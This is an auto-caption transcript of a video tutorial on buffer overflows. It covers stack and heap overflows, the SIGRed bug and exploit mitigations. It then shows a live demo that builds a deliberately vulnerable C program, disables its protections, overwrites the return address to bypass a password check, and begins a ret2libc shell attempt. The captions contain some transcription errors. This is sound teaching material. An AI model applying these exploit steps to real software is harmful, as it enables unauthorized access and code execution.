Buffer Overflow Hacking Tutorial (Bypass Passwords)

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
The point is that shows us about how much  bytes we want to send in as an attacker   to overrun that buffer. I love that because all  the demonstrations I've seen is people are just   stuffing it until they somehow get an overrun  right? Which is great I mean you can use the   pattern tool where you create a pattern and then  you cause a process to crash and then a piece of   that pattern shows up in the register and then you  can ask the tool how many bytes into the pattern   was this piece of the pattern and it shows you  how like that's the buffer size basically but   this is the more elegant way of doing it I  guess. So let's override the return Porter   of the aggressive system and then a four byte padd  and then finally the address of the shell so why   have four byte padd because I know someone's  going to ask we are returning to the system   function that is not how you call a function  you don't return to it you call it look at that   access granted so we successfully bypass  Authentication [Music] Now one of the things   I've learned in IT is that you can't stop learning  you've got to keep on improving your skills keep   on developing your skills and Brilliant are a  fantastic platform for that doesn't matter if   you want to learn Math, Computer Science,  Artificial Intelligence you want to learn   Programming they have fantastic content on their  website you're not just going to be reading a   book as an example or watching videos it's very  interactive and you are involved in your learning.   I highly recommend Brilliant use the link below  to get a 30-day trial and a 20% discount so go   to https://brilliant.org/DavidBombal I really want  to thank Brilliant for their fantastic partnership   and for sponsoring my channel they really truly  are Brilliant. Hey everyone it's David Bombal back   with a very special guest Stephen welcome Stephen  it's great to have you back just for everyone who   hasn't seen our previous video have a look at  the link below Stephen's talking about zero   day millions and how you can like earn millions by  finding a zero day it was a fascinating story lots   of cool stories in that video so have a look at  that video if you're interested in learning more   about Stephen but Stephen just for people who  haven't seen our previous video or don't know   who you are tell us a bit about yourself and  tell us about your channel. Yeah great my name   as David mentioned Stephen Sims I'm a stance  instructor with the SANS Institute and also   the curriculum lead there for the offensive  operations curriculum I'm also a courseware   author of a few of their courses on like Advanced  Pentesting Exploit Development I live out in the   Bay Area in California and I've been doing bug  hunting and exploit development for probably   close to 20 years now time has flown but it's a  lot of fun it's something where you never never   you never lose your interest you never will know  everything. So tell us about your channel because   you've started you started that not so long ago  right? Yeah so I started it off as like when I   retire courseware content from a course through  SANS I'm like well this is content that I think   people would still enjoy just because we're moving  it out and so I reached out to the community and   said hey would you all like to see something like  browser exploitation against Internet Explorer   11 and people said absolutely so I started doing  that way and then continue down like the advanced   technical area but it's branched out a bit like  I just had one last last Friday on hacking Google   Cloud. Yeah so for everyone who's watching we're  going to cover well Stephen tell us the topic that   we're going to cover I'll just say you know go  and look at Stephen's channel for amazing content   Stephen is one of the OGs in this field if you  really really want to learn go and have a look   at his channel and go and subscribe go and show  the love but Stephen what are we talking about   today? Yeah today we're just going to cover a  basic buffer overflows and I think it's important   to do that because even if you want to jump in  at 2023 or 2024 and get into exploit development   you've got to understand the fundamentals even if  a lot of those types of attacks are mitigated in   many cases. You're telling me offline that buffer  overflows have been around forever it's surprising   that they're not dead now but there's some news  coming right? Yeah so I I will always say that   the golden years of exploitation was back in the  90s up into the mid 2000s because there were no   mitigations or security controls that were there  preventing for exploitation to be possible so even   if the vulnerability is still there there are  these mitigations that try and stop the actual   exploitation for being successful or even your  shell code execution so I remember people saying   all the way back in the 90s like the day of  buffer overflow exploitation is coming to an   end any day now and here we are 2023 and it's  still possible but yes as you mentioned there   are some newer mitigations called Control flow  Enforcement Technology or CET as well as Shadows   stacks and other mitigations that are even I will  say like they are the end of buffer overflows the   vulnerability is still there in the code but the  ability to actually exploit the vulnerability is   pretty much will be mitigated completely once  these roll out and if you're on the side of the   fence where you don't want to see this stuff go  away it's still going to be some time because the   actual hardware the processors themselves have to  support the mitigations so they're not just going   to flip they being Microsoft or other vendors are  not just going to flip the switch and make it so   they break all of your apps so it's going to be a  while. So you mentioned Microsoft is that is that   something that's built into Windows or do you have  to do something to enable it? Yeah so on Windows   it's part of something called exploit guard  which used to be called the Enhanced Mitigation   Experience Toolkit or EMET uh Exploit Guard came  out on Windows 10 at some point it's still there   on Windows 11 and it's a I would say mitigation  toolkit where the majority of the mitigations and   there are over 20 are turned off by default  almost all of them because Microsoft doesn't   want to hurt everything out and potentially break  your application so it's up to an administrator to   understand the effect that the mitigations will  have both on application performance as well as   breaking the app depending on how it's coded. And  that's available in Linux and Mac OS as well or   is it just a Microsoft thing yeah most Operating  System vendors all the big ones have ways to turn   this stuff on or off but the each are different  in their own way.And is it what's holding it back   is it the hardware or the applications or? Yep the  world versus Shadow stacks and stuff specifically   uh that's held back by the actual hardware the  processor architecture. That's great so just for   everyone who wants to learn I mean Stephen it's  important to learn this like you said it's it's   a basic building block right that you need to know  so even though this I try to say maybe stop soon   um it's something that you need to learn  right? Yeah and just because Microsoft   might be implementing it doesn't mean that the  IoT world and all these other things out there   are supporting it. Do I mean I want to keep quiet  now and let you take us on this road so perhaps   you can just start like a gentle introduction  and then go hardcore into it. What is a buffer   overflow? Why is it important and I know you know  I just want to let you take us down this road I   know you said you've got some slides and stuff  that you can share so you take it away Stephen.   Yeah great thanks and feel free to chime in  and ask away um so yeah I did put some slides   together a few I want to show you two types of  buffer overflows the the first one's going to   be the most basic ordinary one that you would see  in any college that you attend and go to at some   security classes see but the other one I will show  you is going to be a more advanced one it's just   going to be a screenshot of some disassembly of  uh this one I'll show just because it's easy to   digest is from the SIGRed vulnerability that came  out a couple years ago that affected DNS and that   type of overflow is a heap overflow so they're  both bought for overflows but ones on the stack   and one's on the heap and the second one I'll show  you will be more real world and then I also plan   on we'll see how it goes to plan on jumping over  into command line and we can try and take a look   to see if we can see this in a debugger but  a buffer overflow and its most basic form is   when you're dealing with a function that is being  called if that function needs to say copy a string   meaning a number of characters into this buffer  and interact within the program at that point you   have to allocate the appropriate amount of space  to store this information so to take a step back   each function call that gets made gets its own  stack frame so the stack is its own region of   memory and again every function call gets a stack  frame and some functions will need a buffer and   other ones don't need a buffer so the ones that  need a buffer you need to allocate memory on the   stack and it's a finite lifetime because it's only  going to be there during the function call itself   once the function returns out then that stack  frame gets torn down it's no longer needed so   if that function needs a buffer then you'll then  have a memory copy operation it could be one of   many functions that actually copies the data from  a source into the destination buffer that in this   case would be on the stack so the problem comes  in if there are no balance checks or if we're not   checking the size the number of bytes that are  going to be copied into the buffer then it is   possible for an attacker or just a regular user  to inadvertently send more data into the buffer   than is available which means that overflow of  information has to go somewhere so what is it   overwriting. You know this is saying I think  Einstein said it you really know when someone   knows this stuff when they can explain it simply  and you just did that I mean I've been doing a lot   of search on this and it's like you just explain  it so nicely. So on this slide it's going to be a   very basic C program that has a buffer overflow  vulnerability intentionally written into it so   on the left side where it says encode that would  be the code segment this is where the executable   code is stored in memory while the program is  running while the process is up and running and   then over on the right you see on the bottom right  it says stack that would be a different location   in memory that would specifically be there to  store stack frames associated with the various   function calls so in the code on the left you  see that we're creating a buffer we're calling   it buffer it's a character buffer and we're  setting it for 16 bytes so 16 total bytes of   memory have been allocated on this stack frame  associated with this function called overflow so   if we continue forward we then have a function  called strcpy which is a band function and by   that I mean it's antiquated it's unsafe it should  never be used anymore but it's still out there in   legacy code you will come across so it still has  to be supported but you see where it says strcpy   buffer so that is the destination first which is  that 16 byte buffer that'll be allocated over on   the right and then it says input 1 is the source  so input 1 is going to be coming in from what we   would call the argument vector one so you might  have heard of argv and argc that's the argument   vector encounter argv[0] is always the program  name argv[1] would be the first argument that you   pass in via command line and then if you have  another argument it's expecting argv[2] think   about an example like ping, if you say ping space  127.0.0.1 ping is the program name that would be   argv[0] and then your IP address it you use the  loop back in that case 127.0.0.1 is the address   that we're pinging that would be the argument 1  so in this case whatever the user types in as a   command line argument is being taken and written  via strcpy into that buffer that we allocated with   16 bytes and if you look at the very bottom you  can see we run this program called vuln program   and we're using Python to just send in 12 A's and  you can see that those 12 A's are being written   to memory into that buffer it's being written from  the top downward and that's what that arrow means   pointing down so we've only written 12 bytes in  this case so we're not hurting anything so you   wouldn't realize that there's a vulnerability yet  in this program because the process is not going   to crash if we do this again now you can see on  the bottom we do a times 32 so we're writing 32   A's into a 16 byte buffer you can see over on the  right we've overwritten everything else that was   there notably the return pointer so the return  pointer is how the function that we've called   in this case it's called the Overflow function  it needs to know where to return control after   it's done doing what it's supposed to do so we  do that by returning to the return pointer there   is a special instruction called call so if we're  running this program in the main function so we   just started up the program and you hit this  instruction that says call overflow the call   instruction takes the very next address where  execution would have continued it pushes it   onto memory so that once the function we've called  finishes it knows where to return control in this   case we've overwritten it with these A's so the  process would crash and we get this segmentation   fault where the in the instruction pointer or  program counter it's also called would show us   414141 because the  capital A and ASCII hex is 41. Is there a reason why   we choose a or is it just a arbitrary choice? That's a good question and I there's multiple   takes on that uh what is that hey it's just  the first letter of the alphabet and why not another big part of that is if you see your 414141  showing up anywhere in the process of registers or   memory you know that that's your data that you  sent in so it's kind of like a little signature   but the other reason is that 414141 is typically in a virtual memory   address range that is not mapped into the process  so therefore if you ever try to read from that   address right to that address or execute what's at  that address there's a good chance it's not mapped   and it will just cause an instant crash. I've seen  all the examples it's a so it's great to get a   like a real explanation of that rather than people  just doing it for whatever arbitrary reason so   thanks. No worries so so that's that's in its basic  form again if we start over real quick and just   summarize we start this program called vuln program  it wants an argument so we just send it some A's   the main function is the very first function  to execute once the process is created you can   see here that the main function calls a function  called overflow the Overflow function allocates   a 16 byte buffer on the stack then strcpy copies whatever command line argument you sent   in into that destination buffer on this stack well  since strcpy does not include a size argument   limiting the number of bytes that are permitted  to be written to the destination we can send in   as many as we want and when we overrun that buffer  we're overriding in this case something called the   return pointer which should be how this function  knows where to send the process the instruction   pointer once it's done to continue execution  like it should be but we've overritten it with   AAA causing it to crash what the attacker wants  to do we would attach to it with a debugger and we   want to start understanding if a mitigation such  as address space layout randomization is not on   which it typically is then we can statically  set the return pointer overwrite position so   you see on the image here where it says return  queer now previously we had AAA which caused it   to crash because we try to execute whatever's at  memory address or 41414141 in this case we want   to overwrite that return pointer with an address  in virtual memory where we can send our data so   that buffer that was allocated if we can get the  address of that then we can put our Shell Code   which is our payload we want to have executed  like maybe you've heard of interpreter or just   command exact Shell Code or add a user there's  all different types of Shell Code the two big   parts are you've got your vulnerability which you  exploit to get control of the process then you've   got the Shell Code which serves as your payload  which is what you want to execute once you do   get control so what we want to do is put our Shell  Code into that buffer overwrite the return pointer   with the address as to where that shell code is in  the buffer than when the process goes to return we   get our payload execution that's the goal yeah so  that would be a very basic stack Overflow and as   the time has gone on and on lots of different  mitigations have been put into place to try   to make it so you you can't exploit this simple  vulnerability so it's not treating the root cause   it's treating the symptoms the root cause is the  bad coding the symptoms are obviously these types   of things that we're able to do so an example of a  mitigation would be data execution prevention now   this one came out way back in XP Service Pack 2 if  we're talking about Windows but it wasn't turned   on by default for all processes because Microsoft  didn't want to break your programs but what that   would do in this case if we overwrite the return  pointer with the address of our Shell Code on   the stack it would break the exploit because  the permission that we need which is execute   is turned off with depth being on data execution  prevention so that's a pretty effective control   there are ways to get around it it's like a cat  and mouse game where every time a new mitigation   comes out we try to figure out how to get around  it or avoid it or disable it. Stephen I always see   examples where people using C and using C here  again is there a reason why C is used rather than   say say Python? Yeah great question so these are  low level languages so you've got assembly you've   got C++ these are examples of low level  languages Objective C is another one and these   low-level languages are extremely powerful because  you have direct access to processor registers   direct access to memory and the power to allocate  and deallocate memory and move memory around those   low level operations you've heard that term with  power comes responsibility right with great power   great responsibility something similar to  that you have to be very careful if you're   rating in a language like C because there's no  protection there's no management of the memory   that's being allocated and deallocated to protect  you such as a higher level language like C#   so that's that's kind of the reason behind it  and you might say well why would people use   these low-level languages if they're dangerous  because the speed the speed and power that you   have you might compile something and the compiler  compiles it to a way that you don't like it is   maybe it's inefficient or it's not allowing you  to do something that you want to be able to do   so in C you can just create some inline assembly  right there in your program and you can make it   do what you want it to do so you can literally say  move this data from this register into this other   register and pop this off the stack like it's very  powerful so the higher level languages they manage   memory for you and other controls and protections  to make it impossible or virtually impossible for   those primitive or old school type of attacks  to be possible. I've heard a lot of people say   you should rather use Rust rather than C when  coding in like production. Yeah and absolutely   Microsoft I'm sure you've been watching they uh  just recently a couple months back I think it   was Mark Rosinovich or someone said hey if you're  interested check out the latest update I think it   was a preview version of Windows 10 or 11 and win  32k.sys has some components of it that were are   running in Rust now historically you would see  win32k.sys which is probably C++ it's   a driver but then win32k.rs.sys I think it was  that's the Rust version or at least part of that   has been rewritten in Rust and the interesting  thing about Rust is you get a lot of the speed   and power that you need but with these this memory  safety that you benefit from with the higher level   languages there's a lot to it though it's going  to take I mean there's millions of lines of code   in let's say Windows Operating System so you  can't just overnight swap all that stuff out   and another issue you run into are limitations  with the language because the language hasn't been   around as long and it's not as mature so something  that works fine in C++ may not be possible   in Rust so they've got to work with the language  developers to actually Implement support. But if   I was writing an application based on like your  experience with exploit development and all of   this would you recommend developers today right in  Rust when they can rather than C? Yeah absolutely   yeah. Because I mean it's so nice to see this  example because you know you hear these messages   saying learn Rust or program and Rust but I mean  this this is like a really nice visual example   of why you'd rather use Rust or Python let's say  than C and it's great that you've you know given   us advantages and disadvantages of each so sorry  for taking us on this tension but it's that's   great great information thanks. I always say in  a classroom you've heard this before millions   of times like if you have a question there's a  good chance like 10 other people want that same   question you got to be the one that reason ahead  but yeah there's I mean so many of the browsers   and big applications like Adobe Acrobat Reader and  whatever editor and then you've got email clients   and the operating systems themselves and all these  big applications most of them are in C++ and   it's because of that power and that speed that you  get with that language and you're having to go and   now train a lot of Legacy developers who have so  much history and experience with C++ and   now they've got to learn a new language and that's  going to be come with a set of challenges I want   to jump over to the command line in a little bit  here and and see if we can get ourselves into some   trouble so we'll see we'll see what we got are  able to make happen but I want to show you one   more example of a different type of overflow that  I mentioned earlier which is which would be a heap   overflow so the Heap is actually a different  region of memory than this stack and so when   I say different regions like the code segment  the stack segment the Heap segment what that   really means is you're carving out a different  section in virtual memory that's specifically been   and reserved and allocated to support one specific  thing so the code segment is specifically there   to hold the executable code associated with the  process so in that case you can mark that region   of memory with the execute permission being on  because it has to be on but you don't want it   to be writable so you turn the right provision  off and then all the other segments like the   stack to simplify what the stack is the stack  segment is a specific region of memory that is   used for function calls every function call  gets its own stack frame which just means a   small little allocation reserved specifically  for that function it goes through something   called a prologue at the beginning of the function  that sets up the stack frame and then at the end   of the function you go through an epilogue and  that tears down the stack frame and that is all   compiler inserted code you as a programmer don't  need to care that stack memory again is it's for   finite operations for function calls you get in  you get out now when you talk about the Heap   that's a more dynamic area of memory let me give  you a good example so it'll help you understand   let's say that you're using Chrome and you're  navigating the web and you you go to a website   that's actually a PDF document so you're now your  browser window viewing a 10megabyte PDF document   this stack is not a good area of memory for that  because the stack is like really closely tied to   the code segment where again every time as the  process is running as functions are called that   function that gets called gets its own little  stack frame and it's just constantly going on   and on in the background versus the Heap  that would be a good place to store the   memory associated with that PDF document that  we're looking at because it's not finite the   developer of a browser has no idea how long  you're going to keep that window open we need   to leave that memory stay in use and resident  until the user goes to the URL and changes it   to the Google home page then we free all of that  memory that was being used up by the PDF document   so it can be recycled and reused by the process.  If I understand right can also be very big files   so like hence the example of a 10 Meg PDF or it  could be 100 Meg or something right?yeah so so   The Heap and the stack are both both considered  Dynamic regions of memory that are able to grow   and so therefore they don't play nicely together  you got to keep them apart from each other because   you don't want them colliding into each other so  you'll typically see it where the stack and the   Heap are multiple gigabytes away from each other  and growing towards each other and they should   never collide or you'll see them growing away from  each other that's how Windows does it so again the   Heap is for dynamically allocative memory that  doesn't have a finite lifetime the interesting   thing about that though is this is another area  we're not going to go down the rabbit hole into   this but vulnerabilities like hype confusion use  after free those are Heap related vulnerabilities   when if you're familiar with programming you  know what a function does we call it function   like maybe we create a calculator function and  it wants two arguments give it two numbers and   it will multiply them together and return back to  you the product that's again the functions just   taking those numbers multiplying them displaying  the result and returning out so that function call   doesn't store or preserve anything that you just  did it's just a little template that you can call   over and over again to do a very specific thing  you get in you get out versus the Heap Heap memory   is once it's allocated we maybe maybe we want to  create an object you've heard of object oriented   programming I'm sure so let's say you want to  instantiate an instance of something called   the dog class and this dog class to use a silly  analogy you can choose the breed of the dog and   various attributes such as like the fur color  the size of the dog the eye color of the dog   those are all the attributes you can select and  then you've got the methods or functions like sit   roll over lay down speak and when you instantiate  an instance of this dog you can then reference   that dog the object and say dog dot speak or dog  dot sit and that instance of that object will do   those things you're telling it to do and you can  instantiate as many instances as you want this   all lives out on the Heap it gets very complex  because something has to manage that memory and   manage those objects so that this vulnerability  class called use after free for example if we're   somehow able to trick the process into thinking  that that object is no longer needed and it   destroys it and gives it back to the Heap what  if the process still needs it it goes to access   that object that's supposed to be there oof it  crashes so it gets very complex out there on the   Heap but this example I'm going to show you and  what we're looking at here and I know it's a lot   of a lot of junk it looks like seemingly this is  a disassembled program a little small piece of a   function of a disassembled executable specifically  it's dns.exe from Windows this is a a piece what   we're looking at is where the vulnerability  resides from SigRed if you heard of that   vulnerability from a number of years ago it was a  a very critical vulnerability because it affected   DNS which is a a publicly accessible service so  obviously from an attacker's perspective that's   very interesting the researchers that discovered  this vulnerability were from checkpoint on the   left we've got a snippet of one function and  on the right we've got a snippet of another   function the snippet on the right is called  by the snippet on the left so see I'm using my   mouse cursor I know it's small see where it says  call RR allocateEx the little snippet on the   right is RR allocateEx disassembled so what does  disassemble mean that means when we've compiled   a program the kind that you double click on to  get it to run that's all in machine code so it's   basically hexadecimal and that hexadecimal that  you're looking at are opcodes and operands so   that's you know what the processor uses obviously  for us that's not easy to read a bunch of opcodes   like 90 eb06 34 41 I mean that's  pretty crazy so what a disassembler does is it   takes those opcodes it disassembles them into  their mnemonic representation which is what you   have here on the screen called disassembly it's  still not easy to read this is very low level   what we're looking at this would be an example  of x86 64-bit disassembled code so I put some   notes these little a little bit of blue on the  right everywhere that's comments that I added   in but I'm not going to take like I'm just going  to really quickly show you what the issue here   was you you can see down at the very bottom call  memcpy memcpy is a function that has a size   argument so you would think if it's got a size  argument we can specify the maximum number of   bytes that are permitted to be written to the  destination preventing above overflow so strcpy   didn't have that option there was no size  argument memcopy does so how will there be a   vulnerability let's talk about this because this  gets it's where it gets complex not what we're   going to talk about here but what gets complex  is the calculation of that size argument because   oftentimes we can't statically specify what the  size is so it has to be calculated from something   else and that's something else unfortunately  oftentimes is user influenceable that's a word   we can influence that calculation now to be able  to influence that calculation can be quite complex   and that's where the research comes in but what's  going on here is there was a special DNS query   type that that DNS query type allowed for you to  do interesting things like normally DNS runs over   UDP Port 53 but DNS can also run over TCP 53 that  would allow us to increase the size and and have   um you know ACK and SYN ACK and stuff like that like  it increases some options and this specific type   of DNS query through compression and other factors  allows you to massage or groom how much data ends   up needing to be copied to a destination so this  call to RR_AllocateEx if you look in towards the   bottom on the right it says call Mem_Alloc that's  the actual function that allocates the memory on   the Heap to store the data associated with this  DNS query so we've got to allocate memory to store   the data associated with this DNS query coming in  across a socket so the issue that happens here is   if you look and maybe you can add an app to the  fact a little pointer here it says movzx dx into edi movzx dx into edi movzx cx into esi, dx and cx those  are two byte processor registers two bytes so 2   to the 16th power maximum 65,535 max only the  lower two bytes of this processor register are   being taken into consideration for the memory  allocation, so in other words the maximum memory   allocation can be 65,535 that's the max because   of this vulnerability in the code it should not  be limiting to only 2 bytes but it is and what   happens is we get into trouble because there's  something called an integer overflow if you've   ever looked at an odometer and the odometer says  999999999 when you add 1 to that what happens it   rolls over back to zero or does it really those  digits roll over to zero but it carries the 1   to the left right so the that ends up becoming the  issue if we can cause an integer overflow rolling   over 2 to the 16th power back to zero again the  memory allocation that gets made because it's   only looking at the lower two bytes ends up being  really tiny meanwhile if we go back to the caller   mem copy is what actually needs to copy the data  to that destination buffer that's been allocated   mem copy takes in a unsigned 32-bit integer so  four bytes are taken into consideration not just   two so you see where I'm going so what's going to  happen there is mem copy will happily copy in way   more than 2 to the 16th power to the destination  buffer that wasn't capable of ever holding that   much data so it results in a heap overflow and  that's where we got into trouble here. And that   occurred on the server right or was it the so the  client was able to get overflow on the server? Yep   there was a server side vulnerability so as you  can see just just from that explanation and I try   to simplify it as much as possible but just based  on that that information you can see how much work   complex it is. Now I love I love how you're explaining  those Stephen I mean I can see number one that you   train a lot of people and number two you really  understand this because you're explaining it   simply even though it's complex I appreciate you  doing that. Yeah for sure it's it's a lot of fun I   mean even though a lot of these vulnerabilities  end up getting mitigated they get patched of   course but the folks at Microsoft like uh Matt  Miller who is the guy who wrote the original   interpreter module works at Microsoft now for  a long time he's one of the guys responsible   for implementing and creating these mitigations  that make those types of exploit techniques not   possible what I want to do now if we have time  to do so is jump over the line and just take a   look at what this would look like in the code  it might not let us do it but we'll give it   a shot all right so we're in command line right  now I'm on this just Ubuntu Virtual Machine and   what I want to do is try to create a little  program and intentionally cause it to have a   buffer overflow vulnerability let's go vuln that  sounds good that's it and then we use vim and now   we're going to go ahead and start coding it up so  I'm probably going to add more than I need but I   don't want to have to deal with many compiler  errors so we'll just add in the appropriate   um support that we need so stdio and then it  will include a couple more I don't know if I'm   going to need them or not but better to put them  in than not stdlib close that out so these   are the headers that I need for this and then  I'm going to create a static password in here   you would never do this in the real world but  to find a password and we'll call it password   because that's a great password of course and  then I'm going to start the main function so int   main int and so here's what I'm going to do argc that's the argument counter and I talked a lot   about this a bit earlier and then we'll also do argv  and if you remember argc is the counter argv is   the vector and argv[0] is always a program name so  that's what we'll start with there so let's jump   into the main function here and the main function  I don't know what my ID is current currently let   me see if I can check that real quick so my ID is  1000 I should have guessed that all right so I'm   going to say set uid because what happens a lot  of times is a process will drop your privileges   so I'm going to set it back probably don't need  this normally this would be the case if I want   to make sure it runs as root but I'm not going to  mess with that right now so we've got the setuid   if that works for us if and then I'll say argc  I'm only putting this in to help you understand   if you're not familiar with C very well like  no argument Vector because I'm sure you've seen   um when you run a program if it wants command line  arguments it yells at you and says hey I won't   mail an arguments or maybe it doesn't like command  line arguments so this program I'm going to make   it so it doesn't want commandment arguments  actually so we'll skip the argument Vector   part but I'll still put it in here so char and  what I'm going to do here is say if the actually   that's not what I want if the argument vector is  greater than one so I don't want any arguments in   this program so if the argument counter is greater  than one then I'm just going to give it a usage   statement print F there is no usage let's put that  in there and the reason again I'm putting that in   there is because it should help you see kind of  how the argument vector and calendar works again   argument v[0] is the program name argv[1] would be  the argument that you sent in the very first one   I don't want any so somebody tries to send an  argument I'm going to yell at them and say hey   there's no usage not terribly excited. I mean  keeping it simple which is great. Yeah so all   right we've got that knocked out and then we can  say if that happens we'll exit little one meaning   an error and it will close out so that's a little  check to see if you did in an argument and now   I'm just going to call the vulnerable function or  the function with the vulnerability that haven't   created yet I'm going to call it check password  checkpw and it doesn't want any arguments return   zero if we don't have any issues and then close  out next we got to create the vulnerable issue   of vulnerability so I'm going to create a function  called checkpw and then we go into this function   it's going to say printf please enter the password  or say yes this is the vulnerability I'm using the   gets function you should never use that function  because it doesn't have a size argument so I'm   saying gets(pw) and then inside of here we're going  to say if string compare the password is password   then call to grab the function and we haven't  created that function yet else we're going to   say printf after access denied I'll close that out  let me just think here real quick I'm gonna return   zero and then close this functionality one more  function called granted and this function will   simply say printf if you reach it then printf  access granted and then preparing zero close that   out and that should be our whole our whole program  so if we walk through that again we've got the   main function is the first thing that I'll execute  it tries to set the uid back to 1000 which should   be fine and then it says if the argument counter  is greater than one meaning if someone entered in   any argument print out a message that says there's  no usage and exit out with an error of what zero   would be no error one is an error as a status code  well if there is no arguments call the check pw   function the check pw function says please enter  a password gets pw so it's going to prompt us for   standard input to enter in a password it comes in  it says go ahead and compare the password which is   basically just the string password against what  we sent in if it's zero meaning they were equal   if they matched then call the access granted  function that will print up access granted   otherwise print access denied and return out it's  a pretty simple little program but it's got a   buffer overflow because this guy here doesn't  have a size argument so I've only allocated   a very small buffer have I even done that yet  let me see here nope I forgot to do that glad I   went through that and actually read through that  because it wouldn't have worked. I love it when   most of people like yourself make mistakes it's  encouraging for the rest of us. Especially in very   basic things like this character pw we're gonna  make it a 100 byte buffer all right let's be good   all right so there's a little program let's see  if we can get it to compile now that's going to   be the question it might block us but we'll  try all right let's do uh I'm gonna make it   just a 32-bit executable right now to keep things  simple gcc -m32 now I'm going to put in some   mitigation uh m32 means compile is a 32-bit binary  but I'm gonna I'm gonna kill some mitigations that   would otherwise be automatically added in so I'm  going to say -z is execstack which turns   off death and then also -fno-stack protector  I think that's what it needs to be that says turn   off stack canaries and then the program name is  vuln.c we'll just call it vuln it's going to   yell at us it says it doesn't did you mean  fno stack oh I put in one extra um hyphen all right did it compile so it's yelling  at us it says there at the bottom the   guess function is bad don't use it  well we just ignore that I'll get it   let's see if it actually compiled and it did  so works as expected now we know there's a   vulnerability like so to show you that argument  vector thing if I try to enter an argument it's   saying there's no usage because I enter that in  and if you look at the disassembly it's really   easy to to spot that and you know exactly where  you are in the code because it's doing a little   check now we know this 100 byte buffer so here's  something cool I want to show you which is how can   you determine the buffer size through reverse  engineering as opposed to just cramming in a   bunch of data with a pattern or something like  that so what we could do is go GDB GDB is the   GNU debugger and it's a debugger that supports  four trans C and C++ written by Richard   Stallman many many decades ago it's a command line  debugger that's not very friendly or intuitive but   there are things to help you can get a front end  to it like a graphical front end with DDD or EDD   but uh we're using an extension called gef  you can see down at the bottom that's a exploit   development assistant tool that has a bunch of  functionality that comes along with it Imports   it into the debugger so we can take advantage  of it so I'm just going to say disassemble me   now defaulting to something called the Intel  disassembly syntax GDB by default uses what's   called AT&T syntax basically it swaps the operand  position and does some other things but it doesn't   really affect the program of the behavior it's  just uh how you as the person reversing would   like to see the disassembly displayed nothing more  than that so by looking in this disassembly some   things stick out like right there exit well we  know what the exit function does and we even put   that in there we said return zero and exit uh  puts that's the put string function that just   prints to the screen so something stick out pretty  uh quickly as you're looking in here there's that   set uid remember we tried to set the uid to 1000 so  this 3e8 is very likely 1000 in hexadecimal being   pushed onto the stack as an argument to the set  uid function now this function checkpw we know   that that's the one that's got the vulnerability  in it because that's where I put the gets function   call so if we say disassemble checkpw when we  scroll up here there's that call to gets right   above it so gets needs the destination address  where it's supposed to write the data that works   type in it needs to know where to write it so  we have to give that to the gets function as an   argument this is how we're going to determine  the buffer size so this right here it says ebp   -6c that ends up being upper size because  the ebp is the extended base pointer that's a   stack register and basically by what it's saying  there is take the address of the base pointer that   points to the base of the stack frame minus the  buffer size and that's how it tells the guess   function where to write the data but for us it  tells us the buffer size so we could real quickly   say something like shell python minus C and then  I'll just say print and then what was that size   again that was 6C right so per print 0x6c and  let me close that out and it says 108. so if you   remember the buffer size that we created was a  hundred bytes right so there are other things   that might be playing a role here making it a  little bit bigger but the point is that shows   us about how much how many bytes we want to send  in as an attacker to overrun that buffer. I'll just   I just want to interrupt you and say I love I love  that because all the demonstrations I've seen is   people are just stuffing it until they somehow get  an overrun right. Which is great I mean you can use   the pattern tool where you create a pattern and  then you call it the process to crash and then a   piece of that pattern shows up in the register  and then you can ask the tool how many bytes   into the pattern was this piece of the pattern  and it shows you how like that's the buffer size   basically but this is the more eloquent way of  doing it I guess so we're gonna say run python   minus C print A times I'm going to put 100  so 100 days plus I'm going to put in me BBBB   plus CCCC plus DDDD and the reason I'm doing  this is because we know that if we see 41414141   that that's A's if  we see 42424242 that's   B's if we see 43s at C's you get you get  where I'm going so I'm going to run this what I'm   hoping for is that it crashes and we see some of  those values appearing in the register to help us   let's see what happens. So right here it says 56556202 and we're at this   interesting memory address something's obviously  went wrong here you can see that the base pointer   points to DDD the instruction pointer points to  this strange address so what this is telling me   is that I'm not seeing 4141 or  4242 or 43 or 44 showing up in the instruction pointer because the  instruction but if I successfully overwrite that   return pointer then the instruction pointer should  be pointing to those values because it tried to   return to that as an address so I'm going to run  this again but actually send in four more bytes so   plus EEEE you run this again and now look what it  says cannot access memory at 45454545   so the instruction pointer  actually did return to that address as if it were   real so pretty neat correct if we go back over to  the slides here what we essentially did is send in   a bunch of data and that return pointer down there  is what we wanted to overwrite so by cramming in   enough data we eventually were able to override it  with our Es so now we have control of the pro   the process we can tell it to go wherever we want  it to go this ends up giving it to run a shallow   sorry yeah we should be able to get it to run  a shell if I had Shell Code or something like   that what I'm going to try and do and see if it  lets me is maybe I can return back to the access   granted function somewhere I'm not supposed to be  able to return to bypass authentication the issue   is I didn't compile this as a position independent  executable it's got ASLR on so it might not let us   do this but we'll give it a shot we'll see what  happens here if I disassemble checkpw so these   addresses should be routed consistent what I want  to do is overwrite that return pointer with this   address here so that when it returns it returns  to the call to the granted function allowing me   to bypass authentication see how that would work  so let's see if we can get it to work though I'm   going to take my input here so instead of EEEE  in a little endian format because x86 is little   endian architecture which means it writes the  bytes in reverse order and memory so we have to   write the address in backwards so that it actually  writes in forwards in the right order so 36\x62   by the way if you're busy that means base 16  hexadecimal 55\x56 so I've   now written that address that I have highlighted  in a little endian format that will overwrite   this position here where it says return pointer  if it works will return to the granted function   called bypassing authentication so let's see what  happens here I'm going to let it go and it says   stopped checkpw sigfault but we're in the checkpw  function so if I go up top here look it up   access granted so we successfully bypass  authentication now we we could have overridden   that with a a call to a function or something like  that like that's one cool technique to get around   ASL I mean data execution prevention there's a  technique called Ret2libc it's an older   technique but it works quite well where if inside  the debugger we say print uh let's see here how   about we print system what this is showing us  is the address of the system function so if I   can return to the system function I might be able  to pass it something like an environment variable   like pop a shell like slash business sh something  like that there might be some cool opportunities   there so we have a lot of options which is nice  well one thing I just noticed here is I don't   know why this shell is here this environment  variable is in there but this says shell equals   bin bash so we might be able to return to that  address if we return to system and pass it the   argument of bin bash it might pop a shell which  would be interesting let me see if I can print   that string out in memory though so I'm going to  say x/s that says is a string and then I'm   going to give it a memory address so 0xffffd098  so that's showing us not what I was hoping to see   let's try this address here though so x/s examine as a string 0xffffd337 so shell equals   bin bash so we need to go a little forward  here how about 3a LL how about 3c   3d so bin bash is at this memory address so if  we overwrite the return pointer with the address   of system and pass it this address is an argument  it might pop a shell it might not but we're going   to try it because why not so let's override the  return pointer of the address of system which   I'll highlight real quick it's that guy so xa0 x05E2F7 and then a four byte padd and   then finally the address of the shell so why have  four byte padd because I know someone's going to ask   